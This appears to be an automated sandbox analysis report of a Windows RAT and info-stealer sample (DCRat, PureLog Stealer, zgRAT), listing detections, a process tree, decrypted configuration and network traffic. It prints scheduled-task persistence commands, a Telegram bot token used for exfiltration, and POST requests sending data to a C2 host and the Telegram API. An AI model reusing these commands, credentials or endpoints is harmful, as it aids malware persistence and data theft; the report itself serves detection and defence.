Windows Analysis Report
eP6sjvTqJa.exe

Overview

General Information

Sample name:eP6sjvTqJa.exe
renamed because original name is a hash value
Original sample name:f0944c44a97161524ce95c9f8a2629f9.exe
Analysis ID:1583030
MD5:f0944c44a97161524ce95c9f8a2629f9
SHA1:064fde39864f9095d21fde250473d0a39d6b15b3
SHA256:06c99a90dd5ad6dfb77196b202d73b6cffe2915cf9edc372da859c62ac0bc2e7
Tags:DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • eP6sjvTqJa.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\eP6sjvTqJa.exe" MD5: F0944C44A97161524CE95C9F8A2629F9)
    • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontdrvhost.exe (PID: 3084 cmdline: "C:\/Drivers/fontdrvhost.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
          • schtasks.exe (PID: 3640 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4196 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6008 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3416 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7060 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3564 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5412 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6284 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3172 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1372 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3260 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1268 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3040 cmdline: schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3224 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5632 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3660 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6072 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 4052 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 6524 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • fontdrvhost.exe (PID: 7192 cmdline: "C:\Drivers\fontdrvhost.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • AdbXCBUViTnoVBSsOq.exe (PID: 7048 cmdline: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • AdbXCBUViTnoVBSsOq.exe (PID: 1016 cmdline: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe" MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • fontdrvhost.exe (PID: 6528 cmdline: C:\Drivers\fontdrvhost.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • fontdrvhost.exe (PID: 4328 cmdline: C:\Drivers\fontdrvhost.exe MD5: 0F52130D0A1ABBE40D9F582B1F95A3E3)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
eP6sjvTqJa.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
eP6sjvTqJa.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.eP6sjvTqJa.exe.6c7d6f3.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.eP6sjvTqJa.exe.55ba6f3.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.eP6sjvTqJa.exe.55ba6f3.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\eP6sjvTqJa.exe, ProcessId: 2360, TargetFilename: C:\Drivers\fontdrvhost.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\eP6sjvTqJa.exe", ParentImage: C:\Users\user\Desktop\eP6sjvTqJa.exe, ParentProcessId: 2360, ParentProcessName: eP6sjvTqJa.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" , ProcessId: 4776, ProcessName: wscript.exe

                                    Persistence and Installation Behavior

                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\/Drivers/fontdrvhost.exe", ParentImage: C:\Drivers\fontdrvhost.exe, ParentProcessId: 3084, ParentProcessName: fontdrvhost.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f, ProcessId: 6008, ProcessName: schtasks.exe
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2025-01-01T16:02:15.989325+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 49735 | 104.21.38.84 | 80 | TCP
                                    2025-01-01T16:02:09.731720+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 34.117.59.81 | 443 | TCP
                                    2025-01-01T16:02:10.878208+0100 | 1810009 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49712 | 149.154.167.220 | 443 | TCP

                                    AV Detection

                                    Source: eP6sjvTqJa.exeAvira: detected
                                    Source: http://250345cm.renyash.ru/sqltemp.phpAvira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ruAvira URL Cloud: Label: malware
                                    Source: C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\PjHeJXVW.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Drivers\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\Desktop\beESemrN.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Drivers\fontdrvhost.exeReversingLabs: Detection: 75%
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeReversingLabs: Detection: 75%
                                    Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Source: C:\Users\user\Desktop\OwXMDaSq.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\PjHeJXVW.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\beESemrN.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\crKSmbgv.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\backgroundTaskHost.exeReversingLabs: Detection: 75%
                                    Source: C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exeReversingLabs: Detection: 75%
                                    Source: eP6sjvTqJa.exeVirustotal: Detection: 59%
                                    Source: eP6sjvTqJa.exeReversingLabs: Detection: 65%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\backgroundTaskHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JRcNKQWy.logJoe Sandbox ML: detected
                                    Source: C:\Drivers\fontdrvhost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Internet Explorer\en-US\conhost.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\UXZdmUkL.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\lNXiOOwv.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rWShinUN.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rfCzNWvT.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\rFAHquBj.logJoe Sandbox ML: detected
                                    Source: eP6sjvTqJa.exeJoe Sandbox ML: detected
                                    Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6283373442","bottoken":"8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"}}
                                    Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","fontdrvhost","0","NEWORK PC","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]

                                    Compliance

                                    Source: C:\Drivers\fontdrvhost.exeUnpacked PE file: 5.2.fontdrvhost.exe.2520000.7.unpack
                                    Source: eP6sjvTqJa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\conhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\088424020bedd6
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49710 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49712 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49779 version: TLS 1.2
                                    Source: eP6sjvTqJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: eP6sjvTqJa.exe
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B8A69B
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00B9C220
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00BAB348 FindFirstFileExA,0_2_00BAB348
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Temp

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49735 -> 104.21.38.84:80
                                    Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.6:49712 -> 149.154.167.220:443
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownDNS query: name: api.telegram.org
                                    Source: global trafficTCP traffic: 192.168.2.6:62426 -> 1.1.1.1:53
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466"Host: api.telegram.orgContent-Length: 86650Expect: 100-continueConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                    Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ipinfo.io
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 34.117.59.81:443
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1860Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 250345cm.renyash.ruContent-Length: 1124Expect: 100-continueConnection: Keep-Alive
